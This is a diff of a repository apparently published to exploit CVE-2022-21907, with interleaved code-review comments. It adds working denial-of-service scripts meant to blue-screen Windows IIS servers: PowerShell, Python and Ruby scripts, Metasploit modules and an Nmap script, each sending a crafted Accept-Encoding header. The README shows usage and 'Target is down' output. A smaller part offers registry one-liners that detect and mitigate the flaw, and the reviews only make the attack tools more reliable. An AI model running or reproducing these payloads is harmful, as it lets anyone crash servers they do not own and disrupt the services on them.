diff --git a/CVE-2022-21907.ps1 b/CVE-2022-21907.ps1 index 890d002..79119cf 100644 --- a/CVE-2022-21907.ps1 +++ b/CVE-2022-21907.ps1 @@ -1,4 +1,4 @@ -################### +################### # This script exploit the CVE-2022-21907 for a DOS (Denial of Service) attack (Blue Screen). # Copyright (C) 2022 Maurice Lambert @@ -30,7 +30,7 @@ This is free software, and you are welcome to redistribute it under certain conditions. "@ -write $copyright +write "`n$copyright`n" $session = New-Object Microsoft.PowerShell.Commands.WebRequestSession $session.UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Edg/97.0.1072.62" @@ -55,5 +55,9 @@ $headers = @{ $ErrorActionPreference="Stop" while(1) { - Invoke-WebRequest -UseBasicParsing -Uri "http://$target/" -WebSession $session -Headers $headers + try { + Invoke-WebRequest -UseBasicParsing -Uri "http://$target/" -WebSession $session -Headers $headers -TimeoutSec 10 + } catch { + break + } } \ No newline at end of file diff --git a/CVE-2022-21907.rb b/CVE-2022-21907.rb new file mode 100644 index 0000000..876ef35 --- /dev/null +++ b/CVE-2022-21907.rb 
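Review bot: The `catch { break }` added in the last hunk discards the exception, so the loop ends with no output at all and the user cannot tell a DNS failure, a refused connection, an HTTP error status or the new 10-second `-TimeoutSec` expiry apart; print the reason before leaving, e.g. `} catch { Write-Host "[!] $($_.Exception.Message)"; break }`. The first hunk removes and re-adds a visually identical `###################` line, which suggests a BOM or line-ending change rather than a content edit; if so, a word in the commit message would spare the next reader a diff of invisible bytes. The script's parameter block and the `$target`/`$headers` definitions lie outside these hunks.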
@@ -0,0 +1,161 @@
+#!/usr/bin/env ruby
+# frozen_string_literal: true
+
+##
+# This script exploit the CVE-2022-21907 for a DOS (Denial of Service)
+# attack (Blue Screen).
+
+###################
+# This script exploit the CVE-2022-21907 for a DOS attack.
+# Copyright (C) 2022 Maurice Lambert
+
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+
+# You should have received a copy of the GNU General Public License
+# along with this program. If not, see .
+###################
+
+##
+# Project version
+VERSION = '1.0.0'
+
+##
+# Project author
+AUTHOR = 'Maurice Lambert'
+
+##
+# E-mail of the author of the project
+AUTHOR_EMAIL = 'mauricelambert434@gmail.com'
+
+##
+# Project maintainer
+MAINTAINER = 'Maurice Lambert'
+
+##
+# E-mail of the maintainer of the project
+MAINTAINER_EMAIL = 'mauricelambert434@gmail.com'
+
+##
+# Project description
+DESCRIPTION = '
+This script exploit the CVE-2022-21907 for a DOS (Denial of Service)
+attack (Blue Screen).
+'
+
+##
+# Project license
+LICENSE = 'GPL-3.0 License'
+
+##
+# Project url
+URL = 'https://github.com/mauricelambert/CVE-2022-21907'
+
+##
+# Project copyright
+COPYRIGHT = '
+CVE-2022-21907 Copyright (C) 2022 Maurice Lambert
+This program comes with ABSOLUTELY NO WARRANTY.
+This is free software, and you are welcome to redistribute it
+under certain conditions.
+'
+
+puts "#{COPYRIGHT}\n"
+
+require 'net/http'
+
+##
+# This class implements methods to exploit
+# the CVE-2022-21907 for a DOS (Denial of Service)
+# attack (Blue Screen) with ruby.
+class CVE202221907
+ ##
+ # This function gets target host from the STDIN
+
+ def self.get_stdin_host
+ print 'Host (target): '
+ gets.strip
+ end
+
+ ##
+ # This function generates a random string
+
+ def self.generate_random_string(size)
+ upper_characters = Array('A'..'Z')
+ Array.new(size) { upper_characters.sample }.join
+ end
+
+ ##
+ # This function generates a random payload
+
+ def self.generate_encoding_payload
+ "#{generate_random_string(24)},#{generate_random_string(60)}&" \
+ "#{generate_random_string(2)}&**" \
+ "#{generate_random_string(20)}**#{Array('A'..'Z').sample}," \
+ "#{generate_random_string(73)},#{generate_random_string(71)}" \
+ ",#{generate_random_string(27)},****************************" \
+ "#{generate_random_string(6)}, *, ,"
+ end
+
+ ##
+ # This function checks the target state
+
+ def self.check_up(request, uri)
+ res = Net::HTTP.start(
+ uri.hostname, uri.port,
+ read_timeout: 60,
+ open_timeout: 60,
+ use_ssl: uri.scheme == 'https'
+ ) { |http| http.request(request) }
+ rescue Net::OpenTimeout, Errno::ETIMEDOUT, SocketError
+ puts '[!] This host is probably inaccessible'
+ 2
+ else
+ nil
+ end
+
+ ##
+ # The main function to launch the attack
+
+ def self.main
+ host = ARGV[0] || get_stdin_host
+
+ uri = URI("http://#{host}")
+ request = Net::HTTP::Get.new(uri)
+
+ access_error = check_up(request, uri)
+ return access_error if access_error
+
+ request['Accept-Encoding'] = generate_encoding_payload
+ vulnerable = false
+
+ 10.times do
+ Net::HTTP.start(
+ uri.hostname, uri.port,
+ read_timeout: 10,
+ open_timeout: 10,
+ use_ssl: uri.scheme == 'https'
+ ) { |http| http.request(request) }
+ rescue Net::OpenTimeout, Errno::ETIMEDOUT
+ vulnerable = true
+ break
+ end
+
+ if vulnerable
+ puts "[+] Target: #{host} is vulnerable and down."
+ 0
+ else
+ puts "[-] Target: #{host} is not vulnerable and up."
+ 1
+ end
+ end
+end
+
+exit(CVE202221907.main) if __FILE__ == $PROGRAM_NAME
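Review bot: `check_up` rescues only `Net::OpenTimeout`, `Errno::ETIMEDOUT` and `SocketError`, so a closed port (`Errno::ECONNREFUSED`) or a read timeout (`Net::ReadTimeout`) escapes as a backtrace instead of the `[!] This host is probably inaccessible` message and exit status 2: `rescue Net::OpenTimeout, Net::ReadTimeout, Errno::ETIMEDOUT, Errno::ECONNREFUSED, SocketError`. In the same method `res` is assigned and never read and the `else nil` branch only restates the default return, so both can go. `get_stdin_host` calls `gets.strip`, which raises `NoMethodError` when STDIN is closed or empty; `gets.to_s.strip` plus an explicit error on an empty host gives a readable failure instead. The `##` comment blocks read as YARD headers but carry no `@param`/`@return` tags; `check_up` in particular should state that it returns `nil` when the target answered and `2` (the process exit status) when it did not.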
diff --git a/CVE202221907.py b/CVE202221907.py
index 3e2ecbb..5d528de 100644
--- a/CVE202221907.py
+++ b/CVE202221907.py
@@ -51,35 +51,40 @@ print(copyright) +from urllib.error import URLError, HTTPError from urllib.request import Request, urlopen -from sys import exit, stderr +from sys import exit, stderr, argv +from socket import timeout -host = input("Target: ") +host = argv[1] if len(argv) == 2 else input("Target: ") headers = { - "Accept-Encoding": 'AAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&AA&**AAAAAAAAAAAAAAAAAAAA**A,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAA,****************************AAAAAA, *, ,' + "Accept-Encoding": "AAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&AA&**AAAAAAAAAAAAAAAAAAAA**A,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAA,****************************AAAAAA, *, ," } try: - response = urlopen(f"http://{host}") -except (URLError, HTTPError) as e: + urlopen(f"http://{host}") +except HTTPError: pass except Exception as e: - print(f"http://{host} is not DOWN.") - print(f"{e.__class__}: {e}", file = stderr) + print(f"[!] http://{host} is not UP (get no response).") + print(f"{e.__class__.__name__}: {e}", file=stderr) exit(1) -print(f"http://{host} is not UP. Start hacking...") +print(f"[+] http://{host} is UP. Send payload...") while True: try: - response = urlopen(Request(f"http://{host}", headers=headers)) - except TimeoutError as e: - print(f"http://{host} is not DOWN. {host} is vulnerable to CVE-2022-21907.") - exit(0) - except (URLError, HTTPError) as e: - pass + urlopen(Request(f"http://{host}", headers=headers)) + except (timeout, TimeoutError, URLError): + print( + f"[+] http://{host} is DOWN. {host} is vulnerable to CVE-2022-21907." 
+ ) + exit(0) + except HTTPError: + pass except Exception as e: - print(f"{e.__class__}: {e}") + print(f"{e.__class__.__name__}: {e}", file=stderr) - print(f"Payload sent successfully. Try new request...") + print("[!] Host is up.", file=stderr) + print("[+] Payload sent successfully. Try new request...") diff --git a/README.md b/README.md index 4cb05f0..69868d0 100644 --- a/README.md +++ b/README.md @@ -3,11 +3,31 @@ ## Description 1. This repository detects a system vulnerable to `CVE-2022-21907` (**CVSS:3.1 9.8**) and protects against this vulnerability if desired. I offer 2 powershell codes in 1 line. - 2. I propose a python script and powershell script to attack a vulnerable IIS Web Server (perform a DOS attack to crash (blue screen) the server). + 2. I propose pure python, powershell, ruby scripts and metasploit, nmap modules to attack a vulnerable IIS Web Server (perform a DOS attack to crash (blue screen) the server). ## Detection and protection -### Detect only +### Script + +This script launch 2 online code for detection and 2 online for protection. + +```text +cmd> powershell ./detection_protection_cve2022_21907.ps1 + +CVE-2022-21907 Copyright (C) 2022 Maurice Lambert +This program comes with ABSOLUTELY NO WARRANTY. +This is free software, and you are welcome to redistribute it +under certain conditions. + +Not vulnerable to CVE-2022-2190 +Not vulnerable to CVE-2022-2190 +Not vulnerable to CVE-2022-2190 +Not vulnerable to CVE-2022-2190 + +cmd> +``` + +### Detect only (oneline) ```powershell $ErrorActionPreference="SilentlyContinue";$_=($(Get-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\HTTP\Parameters\ -Name EnableTrailerSupport).EnableTrailerSupport -or $(Write-Host "Not vulnerable to CVE-2022-2190")) -and $(Write-Host "$env:computername vulnerable to CVE-2022-2190 !") 
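Review bot: In the payload loop the new clause `except (timeout, TimeoutError, URLError):` precedes `except HTTPError: pass`, but `HTTPError` is a subclass of `URLError`, so the second clause is unreachable and a 4xx/5xx reply is reported as `[+] http://{host} is DOWN ... vulnerable`; put `except HTTPError: pass` first, as the earlier `try` in this hunk already does. `host = argv[1] if len(argv) == 2 else input("Target: ")` silently falls back to the prompt when more than one argument is given, where a short usage message and `exit(2)` would be clearer. The head of the script, including the banner printed on the hunk's first context line, is outside the hunk.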
@@ -17,7 +37,7 @@ $ErrorActionPreference="SilentlyContinue";$_=($(Get-ItemProperty -Path HKLM:\Sys $ErrorActionPreference="SilentlyContinue";$key=Get-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\HTTP\Parameters\ -Name EnableTrailerSupport;if($key -AND $key.EnableTrailerSupport -ne 0){echo "$env:computername vulnerable to CVE-2022-2190 !"}else{echo "Not vulnerable to CVE-2022-2190"} ``` -### Detect and protect +### Detect and protect (oneline) Run this powershell line **as administrator** to protect your computer/server. @@ -29,7 +49,9 @@ $ErrorActionPreference="SilentlyContinue";$_=($(Get-ItemProperty -Path HKLM:\Sys $ErrorActionPreference="SilentlyContinue";$key=Get-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\HTTP\Parameters\ -Name EnableTrailerSupport;if($key -AND $key.EnableTrailerSupport -ne 0){echo "$env:computername vulnerable to CVE-2022-2190 ! Change EnableTrailerSupport value to 0";Set-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\HTTP\Parameters\ -Name EnableTrailerSupport -Value 0}else{echo "Not vulnerable to CVE-2022-2190"} ``` -## Hack: DOS - BlueScreen +## Exploit: DOS - BlueScreen + +Demontration (using powershell) on youtube: [![DOS attack with powershell](https://img.youtube.com/vi/kaZrfpsh3ds/0.jpg "DOS attack with powershell")](https://www.youtube.com/watch?v=kaZrfpsh3ds) 
@@ -38,18 +60,147 @@ $ErrorActionPreference="SilentlyContinue";$key=Get-ItemProperty -Path HKLM:\Syst ```bash python3 CVE202221907.py # OR +chmod u+x CVE202221907.py ./CVE202221907.py + +python3 CVE202221907.py +# OR +chmod u+x CVE202221907.py +./CVE202221907.py + +python3 CVE202221907.py 10.10.10.10 +# OR +chmod u+x CVE202221907.py +./CVE202221907.py 10.10.10.10:8000 +# OR +python3 CVE202221907.py mywebservername +``` + +```text +~# python CVE202221907.py + +CVE-2022-21907 Copyright (C) 2022 Maurice Lambert +This program comes with ABSOLUTELY NO WARRANTY. +This is free software, and you are welcome to redistribute it +under certain conditions. + +Target: 10.10.10.10 + +[+] http://10.10.10.10 is UP. Send payload... +[+] http://10.10.10.10 is DOWN. 10.10.10.10 is vulnerable to CVE-2022-21907. + +~# ``` ### Powershell ```powershell -powershell "CVE-2022-21907.ps1" +powershell ./CVE-2022-21907.ps1 +powershell ./CVE-2022-21907.ps1 mywebservername +powershell ./CVE-2022-21907.ps1 -Target 10.10.10.10 +``` + +```text +cmd> powershell ./CVE-2022-21907.ps1 + +cmdlet CVE-2022-21907.ps1 at command pipeline position 1 +Supply values for the following parameters: +target: 10.10.10.10:8000 + +CVE-2022-21907 Copyright (C) 2022 Maurice Lambert +This program comes with ABSOLUTELY NO WARRANTY. +This is free software, and you are welcome to redistribute it +under certain conditions. + +cmd> +``` + +### Ruby + +```bash +ruby CVE-2022-21907.rb +ruby CVE-2022-21907.rb 10.10.10.10 +``` + +```text +~# ruby CVE-2022-21907.rb + +CVE-2022-21907 Copyright (C) 2022 Maurice Lambert +This program comes with ABSOLUTELY NO WARRANTY. +This is free software, and you are welcome to redistribute it +under certain conditions. + +Host (target): 10.10.10.10 +[+] Target: 10.10.10.10 is vulnerable and down. 
+ +~# +``` + +### Metasploit + +#### Python module + +```text +msf6 > use exploit/windows/iis/py_dos_iis_2022_21907 +msf6 auxiliary(windows/iis/py_dos_iis_2022_21907) > set RHOST 10.10.10.10 +RHOST => 10.10.10.10 +msf6 auxiliary(windows/iis/py_dos_iis_2022_21907) > set RPORT 80 +RPORT => 80 +msf6 auxiliary(windows/iis/py_dos_iis_2022_21907) > exploit +[*] Running module against 127.0.0.1 + +[*] Starting server... +[*] py_dos_iis_2022_21907.py[10.10.10.10:80] - Trying first connection... +[*] py_dos_iis_2022_21907.py[10.10.10.10:80] - First connection OK. Sending payload... +[*] py_dos_iis_2022_21907.py[10.10.10.10:80] - Target is down ! Congratulations ! +[*] Auxiliary module execution completed +msf6 auxiliary(windows/iis/py_dos_iis_2022_21907) > +``` + +#### Ruby module + +```text +msf6 > use exploit/windows/iis/rb_dos_iis_2022_21907 +msf6 auxiliary(windows/iis/rb_dos_iis_2022_21907) > set RHOST 10.10.10.10 +RHOST => 10.10.10.10 +msf6 auxiliary(windows/iis/rb_dos_iis_2022_21907) > exploit +[*] Running module against 10.10.10.10 + +[+] Target is down ! Congratulations ! +[*] Auxiliary module execution completed +msf6 auxiliary(windows/iis/rb_dos_iis_2022_21907) > +``` + +### Nmap + +```bash +nmap -p 80 --script dos_iis_2022_21907 10.10.10.10 +``` + +```text +~# nmap -p 80 --script dos_iis_2022_21907 10.10.10.10 +80/tcp open http +| dos_iis_2022_21907: +| VULNERABLE: +| IIS CVE-2022-21907 DOS +| State: VULNERABLE (Exploitable) +| IDs: CVE:CVE-2022-21907 +| The IIS Web Server contains a RCE vulnerability. This script +| exploits this vulnerability with a DOS attack +| (causes a Blue Screen). 
+| +| Disclosure date: 2022-01-11 +| References: +| https://nvd.nist.gov/vuln/detail/CVE-2022-21907 +| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21907 +|_ https://github.com/mauricelambert/CVE-2022-21907 ``` ## Sources - [Microsoft](https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21907) + - [nvd.nist.gov](https://nvd.nist.gov/vuln/detail/CVE-2022-21907) + - [Pure ruby script documentation](https://mauricelambert.github.io/info/ruby/code/CVE202221907.html) ## Licence diff --git a/detection_protection_cve2022_21907.ps1 b/detection_protection_cve2022_21907.ps1 new file mode 100644 index 0000000..d69b6bc --- /dev/null +++ b/detection_protection_cve2022_21907.ps1 
@@ -0,0 +1,38 @@
+###################
+# Detect and protect CVE-2022-21907.
+# Copyright (C) 2022 Maurice Lambert
+
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+
+# You should have received a copy of the GNU General Public License
+# along with this program. If not, see .
+###################
+
+$license="GPL-3.0 License"
+
+Write-Host "
+CVE-2022-21907 Copyright (C) 2022 Maurice Lambert
+This program comes with ABSOLUTELY NO WARRANTY.
+This is free software, and you are welcome to redistribute it
+under certain conditions.
+"
+
+# Only detect
+
+$ErrorActionPreference="SilentlyContinue";$_=($(Get-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\HTTP\Parameters\ -Name EnableTrailerSupport).EnableTrailerSupport -or $(Write-Host "Not vulnerable to CVE-2022-2190")) -and $(Write-Host "$env:computername vulnerable to CVE-2022-2190 !")
+
+$ErrorActionPreference="SilentlyContinue";$key=Get-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\HTTP\Parameters\ -Name EnableTrailerSupport;if($key -AND $key.EnableTrailerSupport -ne 0){echo "$env:computername vulnerable to CVE-2022-2190 !"}else{echo "Not vulnerable to CVE-2022-2190"}
+
+# With protection
+
+$ErrorActionPreference="SilentlyContinue";$key=Get-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\HTTP\Parameters\ -Name EnableTrailerSupport;if($key -AND $key.EnableTrailerSupport -ne 0){echo "$env:computername vulnerable to CVE-2022-2190 ! Change EnableTrailerSupport value to 0";Set-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\HTTP\Parameters\ -Name EnableTrailerSupport -Value 0}else{echo "Not vulnerable to CVE-2022-2190"}
+
+$ErrorActionPreference="SilentlyContinue";$_=($(Get-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\HTTP\Parameters\ -Name EnableTrailerSupport).EnableTrailerSupport -or $(Write-Host "Not vulnerable to CVE-2022-2190")) -and ($(Write-Host "$env:computername vulnerable to CVE-2022-2190 ! Change EnableTrailerSupport value to 0") -or $(Set-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\HTTP\Parameters\ -Name EnableTrailerSupport -Value 0))
diff --git a/dos_iis_2022_21907.nse b/dos_iis_2022_21907.nse
new file mode 100644
index 0000000..4c8bdde
--- /dev/null
+++ b/dos_iis_2022_21907.nse
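Review bot: Every user-visible string in this file says `CVE-2022-2190` while the header comment and every other file in the commit say CVE-2022-21907; the same typo is carried into the README one-liners. The `Set-ItemProperty` calls run under `$ErrorActionPreference="SilentlyContinue"` and the "Change EnableTrailerSupport value to 0" text is echoed before the write, so a non-elevated run reports as if it had applied the mitigation when the write silently failed; add `#Requires -RunAsAdministrator` at the top, or re-read `EnableTrailerSupport` after the write and print the actual outcome. `$license` is assigned and never used. As I recall from Microsoft's advisory linked in the README, the `EnableTrailerSupport` value only governs Windows Server 2019 and Windows 10 1809; on other affected builds the key's absence does not mean "Not vulnerable", and the output should say which case it is checking.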
@@ -0,0 +1,83 @@
+description = [[
+ The IIS Web Server contains a RCE vulnerability. This script
+ exploits this vulnerability with a DOS attack (causes a Blue Screen).
+]]
+
+author = "Maurice LAMBERT "
+license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
+categories = {"dos", "exploit", "intrusive", "vuln"}
+
+---
+-- @name
+-- IIS DOS CVE-2022-21907 - Web Server Blue Screen
+-- @author
+-- Maurice LAMBERT
+-- @usage
+-- nmap -p 80 --script dos_iis_2022_21907
+-- @output
+-- PORT STATE SERVICE
+-- 80/tcp open http
+-- | dos_iis_2022_21907:
+-- | VULNERABLE:
+-- | IIS CVE-2022-21907 DOS
+-- | State: VULNERABLE (Exploitable)
+-- | IDs: CVE:CVE-2022-21907
+-- | The IIS Web Server contains a RCE vulnerability. This script
+-- | exploits this vulnerability with a DOS attack
+-- | (causes a Blue Screen).
+-- |
+-- | Disclosure date: 2022-01-11
+-- | References:
+-- | https://nvd.nist.gov/vuln/detail/CVE-2022-21907
+-- | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21907
+-- |_ https://github.com/mauricelambert/CVE-2022-21907
+
+local shortport = require "shortport"
+local stdnse = require "stdnse"
+local vulns = require "vulns"
+local http = require "http"
+
+portrule = shortport.http
+
+action = function(host, port)
+ local vuln = {
+ title = "IIS CVE-2022-21907 DOS",
+ state = vulns.STATE.NOT_VULN,
+ IDS = { CVE = 'CVE-2022-21907' },
+ description = [[
+ The IIS Web Server contains a RCE vulnerability. This script
+ exploits this vulnerability with a DOS attack
+ (causes a Blue Screen).
+ ]],
+ references = {
+ 'https://nvd.nist.gov/vuln/detail/CVE-2022-21907',
+ 'https://github.com/mauricelambert/CVE-2022-21907',
+ },
+ dates = {
+ disclosure = {year = '2022', month = '01', day = '11'},
+ },
+ }
+
+ local report = vulns.Report:new(SCRIPT_NAME, host, port)
+ local headers = {}
+ headers["Accept-Encoding"] = "AAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&AA&**AAAAAAAAAAAAAAAAAAAA**A,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAA,****************************AAAAAA, *, ,"
+
+ stdnse.debug2("Web service is up. Send payload...")
+ local response = http.generic_request(
+ host,
+ port,
+ "GET",
+ "/",
+ {
+ timeout = 10,
+ header = headers,
+ }
+ )
+
+ if (response.status) then
+ return report:make_output(vuln)
+ else
+ vuln.state = vulns.STATE.EXPLOIT -- UNKNOWN, LIKELY_VULN
+ return report:make_output(vuln)
+ end
+end
\ No newline at end of file
diff --git a/py_dos_iis_2022_21907.py b/py_dos_iis_2022_21907.py
new file mode 100644
index 0000000..4607e77
--- /dev/null
+++ b/py_dos_iis_2022_21907.py
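Review bot: `vuln.state` is set to `vulns.STATE.EXPLOIT` whenever `response.status` is nil, so any failure to obtain a status (the 10-second request timeout, a reset, a TLS error on an https port) is printed as `VULNERABLE (Exploitable)`; the script never confirms the service answered before the payload, although `stdnse.debug2("Web service is up. Send payload...")` claims it did, and the other scripts in this commit do a baseline request first. At least report `vulns.STATE.LIKELY_VULN` for that case and turn the dangling `-- UNKNOWN, LIKELY_VULN` comment into a sentence explaining why that state was chosen. The `description` text is duplicated between the file-level field and the `vuln` table; the file-level `description` can be reused inside `action`.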
@@ -0,0 +1,123 @@
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+
+"""
+This module requires Metasploit: https://metasploit.com/download
+Current source: https://github.com/rapid7/metasploit-framework
+
+This module performs a DOS attack using a simple HTTP request.
+"""
+
+from urllib.error import URLError, HTTPError
+from urllib.request import Request, urlopen
+from ssl import _create_unverified_context
+from logging import info, error
+from os.path import basename
+from socket import timeout
+from typing import Dict
+
+from metasploit import module
+
+metadata = {
+ "name": "CVE-2022-21907: HTTP Protocol Stack Remote Code Execution Vulnerability - Windows IIS DOS BlueScreen",
+ "description": "This module can be used to perform a DOS attack on IIS server. This module exploit the CVE-2022-21907 and causes a Blue Screen with only one payload.",
+ "license": "MSF_LICENSE",
+ "authors": ["Maurice LAMBERT "],
+ "date": "2022-01-11",
+ "references": [
+ {"type": "cve", "ref": "2022-21907"},
+ {
+ "type": "url",
+ "ref": "https://nvd.nist.gov/vuln/detail/CVE-2022-21907",
+ },
+ {
+ "type": "url",
+ "ref": "https://github.com/mauricelambert/CVE-2022-21907",
+ },
+ ],
+ "type": "dos",
+ "options": {
+ "rhost": {
+ "type": "address",
+ "description": "Target address",
+ "required": True,
+ "default": None,
+ },
+ "rport": {
+ "type": "int",
+ "description": "Target port",
+ "required": True,
+ "default": 80,
+ },
+ "verbose": {
+ "type": "bool",
+ "description": "Verbose mode",
+ "required": False,
+ "default": None,
+ },
+ "ssl": {
+ "type": "bool",
+ "description": "Use SSL",
+ "required": False,
+ "default": False,
+ },
+ },
+}
+
+
+def run(args: Dict[str, str]) -> None:
+
+ """
+ This module performs a DOS attack using a simple HTTP request.
+ """ + + port = args["rport"] + host = args["rhost"] + ssl = False if not args["ssl"] or args["ssl"] == "false" else True + + payload = { + "Accept-Encoding": "AAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&AA&**AAAAAAAAAAAAAAAAAAAA**A,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAA,****************************AAAAAA, *, ," + } + + module.LogHandler.setup(msg_prefix=f"{basename(__file__)}[{host}:{port}] - ") + + info("Trying first connection...") + + try: + urlopen( + f'http{"s" if ssl else ""}://{host}:{port}', + context=_create_unverified_context() if ssl else None, + ) + except HTTPError: + pass + except Exception as e: + error( + f"The connection was refused by the remote host ({host}:{port})." + ) + error( + f"Auxiliary aborted due to failure: unreachable: {host}:{port} - Could not connect to web service - no response" + ) + return None + + info("First connection OK. Sending payload...") + + try: + urlopen( + Request( + f'http{"s" if ssl else ""}://{host}:{port}', + headers=payload, + ), + context=_create_unverified_context() if ssl else None, + timeout=10, + ) + except (timeout, TimeoutError, URLError): + info("Target is down ! Congratulations !") + return None + except Exception as e: + error(f"{e.__class__.__name__}: {e}") + + error("Target is not vulnerable and up.") + + +if __name__ == "__main__": + module.run(metadata, run) diff --git a/rb_dos_iis_2022_21907.rb b/rb_dos_iis_2022_21907.rb new file mode 100644 index 0000000..ab07af2 --- /dev/null +++ b/rb_dos_iis_2022_21907.rb 
@@ -0,0 +1,82 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+###
+#
+# This module performs a DOS attack using a simple HTTP request.
+#
+###
+class MetasploitModule < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Dos
+
+ ##
+ # Initialize informations about module.
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'CVE-2022-21907: HTTP Protocol Stack Remote Code Execution Vulnerability - Windows IIS DOS BlueScreen',
+ 'Description' => 'This module can be used to perform a DOS attack on IIS server. This module exploit the CVE-2022-21907 and causes a Blue Screen with only one payload.',
+ 'License' => MSF_LICENSE,
+ 'Author' => ['Maurice LAMBERT '],
+ 'Platform' => 'win',
+ 'References' => [
+ ['CVE', '2022-21907'],
+ ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2022-21907'],
+ ['URL', 'https://github.com/mauricelambert/CVE-2022-21907']
+ ],
+ 'DisclosureDate' => '2022-01-11',
+ 'Notes' => {
+ 'Stability' => [CRASH_OS_RESTARTS],
+ 'Reliability' => [IOC_IN_LOGS],
+ 'SideEffects' => []
+ }
+ )
+ )
+ end
+
+ ##
+ # This module performs a DOS attack using a simple HTTP request.
+ def run
+ vprint_status('Trying first connection...')
+
+ res = send_request_raw(
+ 'uri' => "/",
+ 'method' => 'GET'
+ )
+
+ if res.nil?
+ fail_with(
+ Failure::Unreachable,
+ "#{peer} - Could not connect to web service - no response"
+ )
+ end
+
+ vprint_good('First connection OK. Sending payload...')
+
+ payload = {
+ 'Accept-Encoding' => 'AAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&AA&**AAAAAAAAAAAAAAAAAAAA**A,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAA,****************************AAAAAA, *, ,'
+ }
+ timeout = datastore['HttpClientTimeout']
+ datastore['HttpClientTimeout'] = 10
+
+ res = send_request_raw({
+ 'uri' => "/",
+ 'timeout' => 10,
+ 'method' => 'GET',
+ 'headers' => payload
+ })
+
+ if res.nil?
+ print_good('Target is down ! Congratulations !')
+ else
+ print_error('Target is not vulnerable and up.')
+ end
+
+ datastore['HttpClientTimeout'] = timeout
+ end
+end
\ No newline at end of file
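Review bot: `datastore['HttpClientTimeout']` is overwritten before the second `send_request_raw` and only restored on the normal path, so if that call raises instead of returning nil the 10-second value leaks into later runs of the same module instance; wrap the call as `begin ... ensure datastore['HttpClientTimeout'] = timeout end`, or drop the datastore change altogether since `'timeout' => 10` is already passed per request (assuming the client honours that option, which I cannot verify from here). In `initialize`, `IOC_IN_LOGS` is listed under `'Reliability'`, but in Metasploit's module notes it is a `SideEffects` value; move it into the empty `'SideEffects' => []` and either give `'Reliability'` a reliability constant or omit it. Style: `'uri' => "/"` mixes quote styles with the rest of each hash, and the second `send_request_raw({ ... })` uses braces where the first call does not.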